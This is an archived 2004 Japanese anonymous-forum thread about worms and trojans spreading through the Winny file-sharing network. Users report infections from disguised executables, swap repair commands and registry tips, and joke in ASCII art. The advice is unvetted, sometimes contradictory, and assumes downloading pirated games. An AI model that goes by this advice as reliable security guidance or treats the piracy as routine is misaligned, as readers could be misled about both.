「メモ帳のアイコン」ってこのスレでちょっと前にも話題になったジョークソフトじゃねーのか?

891 :[名無し]さん(bin+cue).rar:04/08/22 02:05 ID:USFAFjpQ
あの面白い奴かw

892 :[名無し]さん(bin+cue).rar:04/08/22 02:52 ID:MYo4dOJQ
酒ちょっと美味いぞ

893 :[名無し]さん(bin+cue).rar:04/08/22 10:06 ID:LU2sLw8+
何だよここ・・・ウイルス製作者の溜り場じゃん

894 :[名無し]さん(bin+cue).rar:04/08/22 10:14 ID:ktsw5KQI
>>893 それは言ってはいけなうわなにをすうじこlp;@:「

895 :[名無し]さん(bin+cue).rar:04/08/22 12:04 ID:EtnPqnaE
>>882
UP0なんぞ使うなら、NEGiES等で帯域制限した方がいいぞ。

896 :876:04/08/22 12:20 ID:4da3jgqt
>>887
いいうpろだ知りませんかね〜
あったらうpしまつ

897 :[名無し]さん(bin+cue).rar:04/08/22 12:26 ID:OCz9mqWU
一時期らぶフェチの足のダミカにウイルスがあったとかなかったとか
アホな友達がこれにかかったらしい情報求む

898 :[名無し]さん(bin+cue).rar:04/08/22 12:54 ID:pXeffFoF
アホな友達なんてほっときなさい。


899 :[名無し]さん(bin+cue).rar:04/08/22 13:04 ID:xTOXjbjo
>>897
“友達”といって、自分のことを書くのはやめよう。正直になろうよ

900 :[名無し]さん(bin+cue).rar:04/08/22 13:15 ID:OCz9mqWU
>>899
自分のことだったらもっと必死になるわ

901 :[名無し]さん(bin+cue).rar:04/08/22 13:36 ID:YAejoAh8

  嘘までついて

     必  死  だ  な 

902 :[名無し]さん(bin+cue).rar:04/08/22 13:48 ID:OCz9mqWU
              \   ∩─ー、
                \/ ● 、_ `ヽ こんな餌で俺が釣られると・・・クマー!!
                / \( ●  ● |つ
                |   X_入__ノ   ミ
                 、 (_/   ノ
                 \___ノ゙
                 / 丶' ⌒ヽ:::
                / ヽ    / /:::
               / /へ ヘ/ /:::
               / \ ヾミ  /|:::
              (__/| \___ノ/:::


903 :[名無し]さん(bin+cue).rar:04/08/22 14:19 ID:qbN8Vn1u
>>902
エロゲー総合スレで答えてもらってるじゃん。

206 :[名無し]さん(bin+cue).rar(sage):04/08/22 12:48 ID:OCz9mqWU
おれの友達がらぶフェチの足のダミカをインスコしたらPCがおかしくなった
といってきた。正直何を言っているのか理解できないので
なんか知ってたら教えてくださいエロイ人


904 :[名無し]さん(bin+cue).rar:04/08/22 14:33 ID:OCz9mqWU
>>903
うんあっちのほうが人多かった

905 :[名無し]さん(bin+cue).rar:04/08/22 14:38 ID:pXeffFoF
堂々とマルチカコイイ!!

906 :[名無し]さん(bin+cue).rar:04/08/22 14:42 ID:1Tlbftbm
徹夜2連荘で思わず画像アイコンのEXEを実行しちまった・・・。
再インストールしなくちゃな・・・。
【使用OS】Winows XP Professional
【WindowsUpdateしてるか】はい
【AntiVirusは】なし
【ちゃんとUpdateしてるか】
【スキャンした結果】
【オンラインスキャンしたならその結果は】検出なし
【Winnyのバージョン】
【Winny歴、総DL量は】
【テンプレを読んだか】読んでない
【テンプレにある対策を実行したか】していない
【症状か具体的に、分かる限りすべて書く】
  Windows起動時にHDDへ頻繁にアクセスがある
【何をしたらそんなことになったのか】
  アイコンが画像アイコンになっているEXEファイルを実行
【これまでにとった措置】
  起動時のHDD音に異常を感じたため、
  1)タスクマネージャより「XEROXAUTORUN」を停止
   →HDDへの頻繁なアクセスが止まる
  2)"C:\Program Files\xerox"に画像アイコン表示のXEROXAUTORUN.EXEあり
  3)システムの復元を実行
  4)前述のEXEファイルおよびレジストリの記述が消える
  5)再起動
   →問題なし?

907 :[名無し]さん(bin+cue).rar:04/08/22 14:45 ID:C9PF6Fn4
>【テンプレを読んだか】読んでない

(´♀`) …

908 :[名無し]さん(bin+cue).rar:04/08/22 15:00 ID:YAejoAh8
>>906
      r;ァ'N;:::::::::::::,ィ/      >::::::::::ヽ
.      〃  ヽル1'´        ∠:::::::::::::::::i
       i′  ___, - ,. = -一   ̄l:::::::::::::::l
.      ! , -==、´r'          l::::::/,ニ.ヽ
      l        _,, -‐''二ゝ  l::::l f゙ヽ |、 ここはお前の日記帳じゃねえんだ
        レー-- 、ヽヾニ-ァ,ニ;=、_   !:::l ) } ト
       ヾ¨'7"ry、`   ー゙='ニ,,,`    }::ヽ(ノ  チラシの裏にでも書いてろ
:ーゝヽ、     !´ " ̄ 'l,;;;;,,,.、       ,i:::::::ミ
::::::::::::::::ヽ.-‐ ト、 r'_{   __)`ニゝ、  ,,iリ::::::::ミ    
::::::::::::::::::::Vi/l:::V'´;ッ`ニ´ー-ッ-,、:::::`"::::::::::::::;゙ ,  な!
:::::::::::::::::::::::::N. ゙、::::ヾ,.`二ニ´∠,,.i::::::::::::::::::::///
:::::::::::::::::::::::::::::l ヽ;:::::::::::::::::::::::::::::::::::::::::::/ /
::::::::::::::::::::::::::::::! :|.\;::::::::::::::::::::::::::::::/ /

909 :[名無し]さん(bin+cue).rar:04/08/22 15:16 ID:5g2Lw/jJ
      r;ァ'N;:::::::::::::,ィ/      >::::::::::ヽ
.      〃  ヽル1'´        ∠:::::::::::::::::i
       i′  ___, - ,. = -一   ̄l:::::::::::::::l
.      ! , -==、´r'          l::::::/,ニ.ヽ
      l        _,, -‐''二ゝ  l::::l f゙ヽ |、 ここは俺達の日記帳なんだよ
        レー-- 、ヽヾニ-ァ,ニ;=、_   !:::l ) } ト
       ヾ¨'7"ry、`   ー゙='ニ,,,`    }::ヽ(ノ  最近のチラシは両面印刷で裏なんかねえんだ
:ーゝヽ、     !´ " ̄ 'l,;;;;,,,.、       ,i:::::::ミ
::::::::::::::::ヽ.-‐ ト、 r'_{   __)`ニゝ、  ,,iリ::::::::ミ    
::::::::::::::::::::Vi/l:::V'´;ッ`ニ´ー-ッ-,、:::::`"::::::::::::::;゙ ,  な!
:::::::::::::::::::::::::N. ゙、::::ヾ,.`二ニ´∠,,.i::::::::::::::::::::///
:::::::::::::::::::::::::::::l ヽ;:::::::::::::::::::::::::::::::::::::::::::/ /
::::::::::::::::::::::::::::::! :|.\;::::::::::::::::::::::::::::::/ /

910 :[名無し]さん(bin+cue).rar:04/08/22 16:05 ID:u+8CykSF
ワロタ

911 :[名無し]さん(bin+cue).rar:04/08/22 16:36 ID:x7PzoB7w
>>906
テンプレ読んでね

912 :[名無し]さん(bin+cue).rar:04/08/22 16:42 ID:xPiHiHRb
http://tmp4.2ch.net/test/read.cgi/download/1090455397/570
8/23の12時に「スーパー核爆弾ダブルS」とやらを爆破するそうですw

913 :[名無し]さん(bin+cue).rar:04/08/22 18:58 ID:olg8+xfl
>>908
      r;ァ'N;:::::::::::::,ィ/      >::::::::::ヽ
.      〃  ヽル1'´        ∠:::::::::::::::::i
       i′  ___, - ,. = -一   ̄l:::::::::::::::l
.      ! , -==、´r'          l::::::/,ニ.ヽ
      l        _,, -‐''二ゝ  l::::l f゙ヽ |、 ここはお前が文句言う所じゃねえんだ
        レー-- 、ヽヾニ-ァ,ニ;=、_   !:::l ) } ト
       ヾ¨'7"ry、`   ー゙='ニ,,,`    }::ヽ(ノ  チラシの裏にでも書いてろ
:ーゝヽ、     !´ " ̄ 'l,;;;;,,,.、       ,i:::::::ミ
::::::::::::::::ヽ.-‐ ト、 r'_{   __)`ニゝ、  ,,iリ::::::::ミ    
::::::::::::::::::::Vi/l:::V'´;ッ`ニ´ー-ッ-,、:::::`"::::::::::::::;゙ ,  な!
:::::::::::::::::::::::::N. ゙、::::ヾ,.`二ニ´∠,,.i::::::::::::::::::::///
:::::::::::::::::::::::::::::l ヽ;:::::::::::::::::::::::::::::::::::::::::::/ /
::::::::::::::::::::::::::::::! :|.\;::::::::::::::::::::::::::::::/ /


914 :[名無し]さん(bin+cue).rar:04/08/22 19:36 ID:pXeffFoF
>>906
,r==、、     ,.. ---- 、
:.:.:.:.:.:.:.:.ヽ、.,.::'":::::::::::::::::::::::::`ー-、
:.:.:.:.:.:.:.:.:.:.:.\:::::::::::::::::::::::::::::::::::::::::ヽ
:.:.:.:.:.:.:.:.:.:.:.:.:.:ヽ:::::::::::/γ、;;::::::::::::::::::ヽ
:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.ヽ,/〃~`ーヽ::::::::::::::::::i
:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:l〃     ヽ:::::::;;::::::l
:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:l/    __,,...」::l;::l_;;::::!
:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:lニ  ''〒テ-l:l:::;'-ヽi    ここはあなたの日記帳なのよ
:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.l斗 ,  └'‐ '!l;;/).ノ:!
:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.l  〈!     l l/-くト、!    気にせずジャンジャン書きなさい
:,:,:,:.:.:.:.:.:.:.:,:,:.:ll:.l   、- ッ  ノl //トl ヽ
:,:,:,:,:.:,:.:,:,:,:,:,:,!,l:l;`ヽ、 = ./// .lニー、             ね!
:,:,:,:,:,:,:,:,:,:,:,:,l=l;l‐^ヾニヽ二-ニ-' /`==`_ー-、、   
:,:,:,:,:,:,:,:,:,:,:,:l l!  \二ll二_/      ̄==、、ヽ
:,:,:/l:,:/!:,/l:l       ||          /  l l !
:,:/_l/-!/ l:l       ||          /   l l !
;/-l'-/'‐ヽl、 ,,.. -ー-、. ||   __   /    l l !
'      `/_ ,.. --‐''ヾ.l   \/ i l'   / l l l
       .し'/  ,r--ーヽ-------―\  / l.l l
        (_/ ,,.-r::-ヽ---、_   / /   ll l
         ヽ='‐''"__ lヽ  `ヽ、_    ll l
        l  `ー'''" l   ll=、、    ̄`ヽ.  ll l


915 :[名無し]さん(bin+cue).rar:04/08/22 20:23 ID:2SktLSYa
   !l! | `|ヽ! .| 、 `、 -┐    /イ|  l l! l! i! l  !
    ',! l l!   .i! i` 、ヽ_ノ     ,' l   ! l! l! .l/| ./
      ', !、   i', |ヽヽ` 、    _,. ,'/l!   i.ノ!./! / |/
      ,. ',_| ヽ,  l!',! ``ヽ `  コ .〃/   /、レ | /
   ,.r ' ___ヾ、ヽ l!    >::´::::|  / /''"´|、レ        「なんか最近このスレやる気がないですね?」
   l  ´__ヽ! ̄ ̄ ̄ ̄ ̄l、:::::ノ////:::_:: ┘ヽ
   !  __゙i|        lヽYr‐ ̄- ' ''´::::::::::::::::: ':..,
   ,.'l     ゙i',       / '‐', :::::::::::::::::::::::::::::::::::::::::::: \
 ,l´/ l  '''ス...j. ヽ、__/ ゞ‐′:::::::::::::::::::::::::::::::::::::::::::::: ,.-、、
/ ! l!  ',   ノ  i ::, ' :::::::::://::::::::::::::::::::::::: i :::::::: /::: ,:. ´  ',i
   ',  ヾ-┐   ,'' :::::::::://::::::::::::::::::::::::::::::: i :::::: /‐´    、 |



!  ヽ、ヾ! ゙!          ‘     ,' l,イ/ '  ,'イ
'、   `ー! lヘ       , ‐ァ    ,. '! l |´|  '´!l
     ', ',ヾ! 、     ー'  , '´ ! | l !   !!
      ', ', ', `  、    , '´   l ,' .l_,. 、'l        「それもそうだが、次スレのテンプレはこのままでいいのか?」
      ', ', !    ` i'´     i/ //,...,_ ヽ.,
       ,.ゝ',''!        !,! ̄ ̄ ̄ ̄ ̄lゝ'゙___`  i
   _,. - '"  ヾ 、    __' |          !Y__   !
                ',       /コ     ト、
                ヽ、__/ └エ''   l  `
                         '、   /


916 :[名無し]さん(bin+cue).rar:04/08/22 20:44 ID:GTzwIhts
今は公判まで静かに待つのみ……

917 :[名無し]さん(bin+cue).rar:04/08/22 21:33 ID:USFAFjpQ
>>916
そーいや、米国の方のは無罪判決だったらしいな。

918 :[名無し]さん(bin+cue).rar:04/08/22 22:29 ID:eGI551Uv
結局蓮コラのはまだ解決法見つかってないの?

919 :[名無し]さん(bin+cue).rar:04/08/22 22:31 ID:9mpayJsA
おいもまえら凄い島がありますた
http://www.livly.com/mypage.php?uid=1EFu&s=4

920 :[名無し]さん(bin+cue).rar:04/08/22 22:45 ID:pXeffFoF
>>919
怖くて見れませぬ

921 :[名無し]さん(bin+cue).rar:04/08/22 22:49 ID:6Rw2WkRb
>>919
ソースチェッカーの判定
[このアドレスの安全度 90%]

922 :[名無し]さん(bin+cue).rar:04/08/22 22:52 ID:MYo4dOJQ
>>919
初期ノード登録?

923 :[名無し]さん(bin+cue).rar:04/08/22 23:02 ID:iI7CTDW3
-- 「2004/08/22 22:42」のキャッシュをチェックしています。 --
ブラクラチェックが終了しました。

※ windowオープンを発見しました。(4)
book/index.php?uid=1EFu
※ プラグインデータを発見しました。(2)
event.swf
livly.swf?roomID=1EFu&siteIP=island04.livly.com
上記アドレスのチェックもお勧めします。(そのままチェックできます。)

なんかフラッシュ置いてあるな

924 :[名無し]さん(bin+cue).rar:04/08/22 23:11 ID:iI7CTDW3
今、調べてみた リヴリーアイランドで検索
害はないと思う 子供向けな内容と感じた

もうそろそろ次スレかな?

925 :[名無し]さん(bin+cue).rar:04/08/22 23:42 ID:6Rw2WkRb
飼い主がwinnyさんね・・・。リヴリーとやらはいないけど。
飼い主名の下のは、初期ノードか?

926 :[名無し]さん(bin+cue).rar:04/08/22 23:44 ID:rQ377yD+
やっとノートン先生が蓮コラウィルスの各種亜種に対応してくれた

927 :[名無し]さん(bin+cue).rar:04/08/23 00:22 ID:yArDPyUI
バスター WORM_ANTINNY.M WORM_ANTINNY.N WORM_ANTINNY.S
TROJ_NULLPORCE.Cに対応。解説まだなんで、どれかわかんねーorz

928 :[名無し]さん(bin+cue).rar:04/08/23 00:48 ID:2ZxjH6GB
>>832
漏れもギシアンにひっかかってとりあえず大事なデータだけ移して再インスコしたのだが

セーフモードでシステム復元して、コマンドプロンプト起動

次のコマンドを実行
C:\>assoc .exe=exefile
C:\>ftype exefile="%1" %*

それでなんとか普通に起動できたが、タスクマネージャがギシアンにすりかわっていたので
他に何がすりかわったかもわからんから気をつけてくれ。

・・・もしかしたらタスクマネージャ本体を捨てればいいのかもしれんがな。


929 :[名無し]さん(bin+cue).rar:04/08/23 00:59 ID:C3H9cxHE
タスクマネージャー本体をI869か何かから引っ張ってきても駄目なのかああ、そうですかそうですか

930 :[名無し]さん(bin+cue).rar:04/08/23 02:06 ID:58j27v5S
酒マズー

931 :[名無し]さん(bin+cue).rar:04/08/23 02:49 ID:/MqBHMPt
マラソン金メダルキタ━━━━━(゚∀゚)━━━━━ !!!

     ┌─┐  ┌─┐
      │●│  │●│
      └─┤  └─┤
      _   ∩   _  ∩ にっぽん!
    ( ゚∀゚)彡  ( ゚∀゚)彡  にっぽん!
 ┌─┬⊂彡┌─┬⊂彡
 |●|    |●|
 └─┘    └─┘


932 :[名無し]さん(bin+cue).rar:04/08/23 09:00 ID:s6hlUwhU
みなさんsystem32内にconime.exeってあります?
変な動きするんですが・・・・。
winny起動時・ダウン指定時にかなり動く・・・・。
何かのウイルスの子じゃありませんように・・・・・。

933 :[名無し]さん(bin+cue).rar:04/08/23 09:12 ID:jxo7REAS
普通にありますが
私のシステムでは問題はありません。

ttp://www.google.com/search?num=100&hl=ja&inlang=ja&ie=UTF-8&q=conime.exe&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=lang_ja

934 :[名無し]さん(bin+cue).rar:04/08/23 09:23 ID:s6hlUwhU
>>933
conime.exeはIMEのさしがねですか・・・・。
orz
心配して損した・・・・。
orz
ただ、このファイルが感染してないとはいいきれんが・・・・。
様子見してみます・・・・。
サンクス!&スマソ!
ノシ

935 :[名無し]さん(bin+cue).rar:04/08/23 10:58 ID:s6hlUwhU
何かさっきから様子見してるが、キャッシュがかなり消えてる・・・・。
まあ、無視リストに登録してたのが消えたのはわかるが・・・・。
接続も切断されすぎ・・・・。
orz
かなり動き不安定だ・・・・。
nyってこんなんだったっけな〜?
2ヶ月やってないだけでこんなに変わるものなのか?

936 :[名無し]さん(bin+cue).rar:04/08/23 11:14 ID:W14GXuoC
新鮮なノードを登録したら、接続は維持できると思うが。
最新パターンファイル入りのワクチンソフトとテンプレ対策で、ウイルス
退治もやっとけ。

937 :[名無し]さん(bin+cue).rar:04/08/23 11:51 ID:ei815whC
最悪w
今よくよく考えたら・・・・・・・nyのポート設定すんの忘れてた・・・・。
orz
もうだめぽ。
今日はもう立ち直れなさそう。
初心者的なミス・・・・・もうやだ・・・・・。
ごめん、>>936・・・・まじめな回答させてもうて・・・・。
もう今日はnyやらね。
(・ω・)ノシ

938 :[名無し]さん(bin+cue).rar:04/08/23 11:52 ID:AA2ulKRQ
>>934
conime.exeはコンソールIME、つまりコマンドプロンプトで日本語入力を可能にするプログラム。
コマンドプロンプトで日本語入力しないなら不要、デフォルトだとコマンドプロンプトを起動すると
一緒に起動するようになっている。
HKEY_CURRENT_USER\Console\LoadConIme
を0にする事でコマンドプロンプトと同時起動を防げる。

939 :[名無し]さん(bin+cue).rar:04/08/23 12:39 ID:9w+xbLFY
日記を書きたい人はこちらで
ファイルの中に入っていた.exeを思い切ってダブルクリック
http://tmp4.2ch.net/test/read.cgi/download/1090567937/

940 :[名無し]さん(bin+cue).rar:04/08/23 13:05 ID:0gJeNTZn
なんでもかんでもウィルスにするなって

941 :[名無し]さん(bin+cue).rar:04/08/23 13:14 ID:ei815whC
>>940
ごめん。
上にも書いたように漏れの勘違い&設定ミス。
みなさん、スマソ。

942 :[名無し]さん(bin+cue).rar:04/08/23 17:28 ID:iHYFO0dh
hamichan@gmx.de
ttp://eliet.starthotel.dk/higemoja/tri_yossi.php
ttp://higemoja.ultraserver.org/tri_yossi.php

943 :[名無し]さん(bin+cue).rar:04/08/23 18:45 ID:x1Hk+UoX
UP速度とDOWN速度が表示されなくなったんですが
これもウィルスですか?

944 :[名無し]さん(bin+cue).rar:04/08/23 18:57 ID:96Yl3QMH
>>943新種のヴァイルスだな
フォーマットをお勧めする

945 :[名無し]さん(bin+cue).rar:04/08/23 18:58 ID:z8+tDV4t
【使用OS】 XP
【WindowsUpdateしてるか】 してる
【AntiVirusは】 ノートンアンチウィルス2003
【ちゃんとUpdateしてるか】 してるけど期限が今月末
【スキャンした結果】 無し
【オンラインスキャンしたならその結果は】 無し
【Winnyのバージョン】 2.0b7.1
【Winny歴、総DL量は】 約1年 量はわかりません
【テンプレを読んだか】 読んだ
【テンプレにある対策を実行したか】 しました
【症状か具体的に、分かる限りすべて書く】 フォルダのタスクや表示が勝手に変わり、カスタマイズすると、
関係の無い他のフォルダまで何故かカスタマイズされる。例えばマイピクチャの中の1個(A)のフォルダが、
.jpgしかないのにビデオのタスクになり、そこをフォトにしたら、マイミュージックの中の1個(B)がフォトになり、
(B)を音楽にしたら、(A)が音楽になる。何回繰り返しても堂々巡りになる

【何をしたらそんなことになったのか】 イメージCDをデーモンでマウント、スキャンしても問題なかったから、インストール
し、起動のアイコンが変だったが、むりやり起動したら、コマンドプロンプトが出てきて、消せないから強制終了した。

【これまでにとった措置】 winnyを消し、変わるフォルダの中身を他のフォルダに入れ、変わるのを消していったが、
C\の所までかわり、どこか別のフォルダと症状に書いた関係があり、表示リセットしても直らないです。

946 :[名無し]さん(bin+cue).rar:04/08/23 19:09 ID:B8Zj51dg
>>945新種のヴァイラスだな
フォーマットをお勧めする(マジレス


947 :[名無し]さん(bin+cue).rar:04/08/23 19:25 ID:ebxD1FbW
何落としたか書けよ(゚Д゚)

948 :[名無し]さん(bin+cue).rar:04/08/23 19:27 ID:YH+CqnLA
nyを普通に起動したら、
いきなりノードがどんどんと消えて言ったんだけど。
これってどういうウィルス?

949 :[名無し]さん(bin+cue).rar:04/08/23 19:36 ID:YH+CqnLA
>>948
ウィルスに掛かったかと思ったが、
かなり待ってからノード入れ替えたり
ウィルスバスターで駆除作業したりしたら
普通に戻った。スレ汚しスマソ。

950 :[名無し]さん(bin+cue).rar:04/08/23 19:43 ID:/xqiPXpy
>>945
関係ない。

951 :[名無し]さん(bin+cue).rar:04/08/23 19:45 ID:xmaWfcpH
>>949
釣りじゃなくてマジだったのかよ。初心者はnyの質問スレに逝け

952 :[名無し]さん(bin+cue).rar:04/08/23 19:46 ID:YH+CqnLA
>>951
おいおい、初心者スレでそんな質問したら
結局はこのスレに誘導されちまうだろ。

953 :[名無し]さん(bin+cue).rar:04/08/23 19:51 ID:a/HZ0jhN
本当の初心者はわかってないから発生場所はランダムなんですよ?

954 :945:04/08/23 19:54 ID:z8+tDV4t
>>946>>950が正反対の意見のようだけど、どっちなんでしょう?

955 :[名無し]さん(bin+cue).rar:04/08/23 19:59 ID:Ti+iDT0m
>>952
しないよ

956 :[名無し]さん(bin+cue).rar:04/08/23 19:59 ID:Ti+iDT0m
>>954
判断できないんなら再インストしたら?

957 :[名無し]さん(bin+cue).rar:04/08/23 20:33 ID:brjsxDDV
>>954
復元は使えないの?

958 :[名無し]さん(bin+cue).rar:04/08/23 20:43 ID:dq47DebW
アーワレワレハー

959 :[名無し]さん(bin+cue).rar:04/08/23 20:46 ID:IOpECnbc
ナツチュウデアル〜

960 :[名無し]さん(bin+cue).rar:04/08/23 20:50 ID:gKDvPMzk
次スレはどうすんだい?

961 :[名無し]さん(bin+cue).rar:04/08/23 20:55 ID:r5m+5lqt
       / ザン /                   / ギエフ♪/

         .;;''';;:,                          .;;''';;:,
      _,..r'i"台"iヽ、_                    _,..r'i"台"iヽ、_
  ,.;;'"⌒ー--"'''i'''"--ー⌒"';;、_       _(ヽ、 ,.;;'"⌒ー--"'''i'''"--ー⌒"';;、_ ,'")__
/ ̄i l'")))⊃;:;;:i:;;;:;⊂((("'l i  ̄ヽ    iニ i lヽ )ヽj_  i ...:;:;:;;;;;;;i;;;;;;:;:;::.. i  ,.レ'( /l i ニi
ヽ_レ""i'' "-::;;:;;::-'" 'i'""ヽノ_ノ     i三LLノ_ヽ ヽ、 l..,,,"-::;;:;;::-'",,...l / /ヽ_l_l三i
      ヽ;;::___:;:___,,.:/               \_  ノヽ;;::___:;:___,,.:/ヽ  /
     /-、''':::::'''..-''ヽ                 ̄  /-、''':::::'''..-''ヽ   ̄
    /_,,  ヽ;::;ノ '" ヽ                 /_,,  ヽ;::;ノ '" ヽ
   / x, ヽノヽ/ .x "'、               ( ノ x, ヽノ ヽ/ .x "'、
   (.,, ,. _/  \:; .,,ノ,              ミミ  ,._/   ヽ:; .,,ノ,
   i 彡,,..ノ,     i".,,_ミミi             彡ミ  ,,..ノ      i".,,_ミミi
    l┐i-7     ヽ"-iΠ         ___/> へノ       ヽ"-iΠ
   // )      / \\       (   /  /        / \\
  (_/"       "'\__)        ̄\_ノ          "'\__)


962 :[名無し]さん(bin+cue).rar:04/08/23 21:38 ID:EuXkY7UB
ゲームとかで普通にインストールしただけで感染するウィルスってある?
CDの中身をウィルスチェックして反応なかったら(基本的には)大丈夫と考えていい?
autorunとかsetupとかだけ警戒すれば基本的にはOKなのかな?
ちょっと不安障害ぎみなんでこのスレを見るだけで怖くてプログラムに触れない……。
いやそんな不安ならWinny使わなきゃいんだけど。

963 :[名無し]さん(bin+cue).rar:04/08/23 21:45 ID:z6KWXoAU
>>943
同じ症状になったことがある
Winny.ini消せば直るよ
設定しなおすの面倒だけど

964 :[名無し]さん(bin+cue).rar:04/08/23 22:18 ID:UjeKHwdU
>>962
ゲームやその他アプリってのは、誰かがnyに流してるんだが
その誰かが感染してれば、.exeやそのほかの実行形式ファイルは
感染してる可能性が高い。autorunは故意に仕込んでいるものだろ
キンタマみたいに流すタイプもあれば、pinfiとかにかかってるのも多いな。

965 :[名無し]さん(bin+cue).rar:04/08/23 22:37 ID:LtEZw/bX
>いやそんな不安ならWinny使わなきゃいんだけど。

正解
新種亜種には対応するまでウィルスチェックも意味なーし
実行系のファイルは全て自己責任でお願いします

966 :[名無し]さん(bin+cue).rar:04/08/23 22:42 ID:EuXkY7UB
>964-965
ありがとー。
実行ファイルをチェックして大丈夫そうなら後は運頼みってことでいいのかな。

967 :[名無し]さん(bin+cue).rar:04/08/23 23:04 ID:i1TM69z6
なんていうかカモだね

968 :[名無し]さん(bin+cue).rar:04/08/23 23:17 ID:Xb36Lr4F
winnyに接続するといつもUPだけが500ぐらい出て、DOWNが24とかなんですけど
ウイルスに感染しているのでしょうか?

969 :[名無し]さん(bin+cue).rar:04/08/23 23:23 ID:rf2AKHdh
>>968
仕様、マターリ汁。

970 :[名無し]さん(bin+cue).rar:04/08/23 23:30 ID:p3Ct/ou1
次スレどうぞ

【警報】Winnyを狙ったワーム・ウイルス情報 Part25
http://tmp4.2ch.net/test/read.cgi/download/1093270545/

971 :[名無し]さん(bin+cue).rar:04/08/23 23:30 ID:YkRgAYuf
ゲーム、多く仕込まれてる

972 :[名無し]さん(bin+cue).rar:04/08/23 23:41 ID:wVVkPxh6
>>970
乙!

973 :[名無し]さん(bin+cue).rar:04/08/23 23:59 ID:orCJ9Exw
>>966
こんなお気楽なヤツが多いならつり放題だろうな

974 :[名無し]さん(bin+cue).rar:04/08/24 00:50 ID:yktktAO3
テンプレも修正したほうがいいところがちらほらあるが・・・めんどくさいからいいや

975 :[名無し]さん(bin+cue).rar:04/08/24 01:11 ID:lMRmj0Nz
>>973
たかがウイルスにビクビクしてても恥マンねえ
HDがぶっ飛んだら飛んだとき。
そもそも、nyでの大事なデータは、人生において全然大事じゃない物。

976 :[名無し]さん(bin+cue).rar:04/08/24 06:10 ID:T4wDG2mE
ゲーム関係なら真贋倉庫利用汁

977 :[名無し]さん(bin+cue).rar:04/08/24 15:51 ID:2joS4n/i
なんでもかんでもウィルスにするな

978 :[名無し]さん(bin+cue).rar:04/08/24 16:47 ID:7/hEJjM1
>>976
ググってみたけどそれらしき物がない・・・
真贋倉庫って俗称?

979 :[名無し]さん(bin+cue).rar:04/08/24 18:59 ID:ETK300Ds
利用促進age

980 :[名無し]さん(bin+cue).rar:04/08/24 19:21 ID:RegQ+4xw
デスクトップにダウンロードした記憶のないフォルダが大量にあるんですがウイルスですか?

981 :[名無し]さん(bin+cue).rar:04/08/24 19:24 ID:lA9ZQ96o
俺がトロイ仕掛けてオマエのパソいじってるだけなので安心してください

982 :[名無し]さん(bin+cue).rar:04/08/24 20:10 ID:M9Fajjri
       ,. - ── - .
        /:::::::::::::::::::::::::::::\
.     /:::::;:::::::::/ ∧:::::::::::::::::',
     /:::i:::/:/i:/ /  ト.:::i:::::::::::i 
      i::::i/レ'      `VV;::::i    暇やなぁ〜
.     i::::;i '''""~   ~~゙゙''' |;::::| 
    |::::;|           ノ;::::|
_/´⌒、ヽゝ.   r ァ   ,.イィ ⌒ヽ__
  `ーーー' ' ̄ `` ー--‐ '´ ̄ ーーー'    \─ 、_______
                        >  \\ \ \ \ \
                        /   /  \ \ \ \ \
                      /   /====================ゝ



983 :[名無し]さん(bin+cue).rar:04/08/24 20:23 ID:sSGgtGb/
                       /rニー 、` ー、
 誰もいないの?              /´/'´ _,. l,.....ヽ  ヽ
                        r''ヘ_ _ ,.r' l  lヽ  .i
                      ,r '´l _. リ !    / l.〉 l,r
                  l   、i(._`    `ー-‐'ヽ./   l`
               ,r::'::::l   !ヽ_`ヽ_,..、     '⌒r_'
    r‐ 、       _  i:::::;::;_;l-'´` ‐ ̄._ l   _,、_'ノ- i、._
    l    `-、..-i' ´  ヽ_,.ゞ- 、      r ' ´ ̄       /:::::::::`ヽ
   !     ,..rー、    ヽ.  ヽ     ./     _,...-::'´:::::::::::::_;/
    ヽ、   /     ,ヽ.    i.   ヽ   -r:::::'::::´:::::::::::;::::-‐::':´::::::)
      `‐/ 、__ ./ヽ,入_,ノ     l  ,r'´ ` ー ::::_::::::::::::::_;:::- ' ´
     _,/     /.  ヽ_   _,.. -ヘ-'         ̄
  r' ´      ヽ       ̄
  ヽ、      _ノ
      ` ―― ''´


984 :[名無し]さん(bin+cue).rar:04/08/24 20:30 ID:8AfuHGXX
>>978
真贋倉庫 Winnyでぐぐってみろ

985 :[名無し]さん(bin+cue).rar:04/08/24 20:31 ID:sE84LO9l

 /    / ,. ‐ '"´ i  , ` 'ー 、  \
 〉ー-/ /   i ,. |  l  ',.   `ヽ、 ヽ
 〉  j/   l. || l  l  l、 ヽ.    \        
  ヽ/ ,. ,'  | | ', l  l,   lヽ \  ,          
  /./ .l  | | ',.', ヽ  _',.> 、ヾ.|
  ,' ,.!  |  ,ハ. |  ヽヽ. ヾヽ,ニr‐''":「|
  |.ハ  |-┼',lエニ ヽ\l.  !l::::::::j.}
  |!  l. ! |'´ ゙l;l;:::ヽ      ヾ、;シ'| i   1,000ゲト狙って、待機中です。
    ト、.ト、|  ヾ;::::!.       ̄,, | |
     |l | `.l. -‐_'´ i.         | |
    |l |   ト.、./ .l.   rュ     /l |
    |l |  | ./  | 、 _    / | |
     .|l |   l/  / |  `l ー ´ _,.|./レ'
     |l |! /- ‐ -.、|_ ,「「|゙∨:!.| l'
      |l,r‐/ --- 、 | } .j.|::::::::l |  _,.
      / l _  ∨ .|T´ ̄`r<二. __
    /   l  ,、. `j ノ j |   |


986 :[名無し]さん(bin+cue).rar:04/08/24 20:34 ID:2gAozhIo
   |                    ヽ- 、
   |    /       ヽ   ヽ  ヽ   ヽ  \
   |   /    } }    }    i:   }:  i i   \
   |   ::|     | |:   |::   |::  |::  }: |   人
   |   :||    }} }:    }}:::  }::  }::  } }   /  ヽ
   |   :||   ハリ:   ハ;;_ハ;;_ノ};;___ノレ'  / ::/ }
   | ̄ ̄  ̄ ̄   ̄ ̄   _,.--‐‐、./::ノハノ / ノ
   | ̄ ̄ ̄`゙ ー- 、    / _,,,,ィ /;;//  i   ノ
   |_ニェ=--、ー-、  `    rシ;イヾ彡ノレ;;;:____} ;乂
   |ィ{:;;(フ;;:::}``ーミヽ    r'イ;ノ,_, /::::   ,;:-''::::;ハ
   |\;;;;;;;;厶-‐         ̄ ̄ /i:;;;;;;, -'":::::::/  }
